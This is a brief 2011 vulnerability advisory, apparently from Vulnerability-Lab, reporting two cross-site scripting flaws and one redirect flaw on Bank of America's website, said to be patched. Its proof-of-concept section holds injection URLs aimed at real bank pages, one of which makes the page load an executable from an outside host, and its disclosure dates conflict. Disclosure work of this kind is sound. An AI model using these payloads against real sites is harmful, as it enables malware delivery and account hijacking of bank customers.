Document Title: =============== Bank of America Website - Multiple Web Vulnerabilities Release Date: ============= 2011-07-15 Vulnerability Laboratory ID (VL-ID): ==================================== 10 Product & Service Introduction: =============================== Official Website of the Bank of America (USA) Abstract Advisory Information: ============================== An anonymous laboratory researcher discovered 3 input validation vulnerabilities(2x Cross-Site 1x Redirection) on the BOA Website(bankofamerica.com). Vulnerability Disclosure Timeline: ================================== 2010-11-14: Verified by Vulnerability-Lab 2010-12-03: Secure Vendor Notification 2011-01-04: Fix/Patch Vulnerability 2011-07-14: Discovery by Vulnerability-Lab Discovery Status: ================= Published Affected Product(s): ==================== Exploitation Technique: ======================= Remote Severity Level: =============== Low Technical Details & Description: ================================ 1.1 A remote attacker can form specific manipulated request with non-persistent vector to hijack customer/banking accounts on the main website. 1.2 A redirection vulnerability allows an attacker to load on a client-side request different external content/websites. Proof of Concept (PoC): ======================= The IVE vulnerabilities can be exploited by remote attacker with medium user inter action. For demonstration or reproduce ... IVE Reference: http://www.bankofamerica.com/smallbusiness/promos/jump/merchant_meetorbeat/?cm_sp=SB-Merchant-_-SB-MerchantAcquisitionSB-_-%3E%22%3Ciframe%20src=http://global-evolution.info/etc/bad-example.exe> http://www.bankofamerica.com/vehicle_and_personal_loans/index.cfm?template=auto_loans&cm_mmc=>"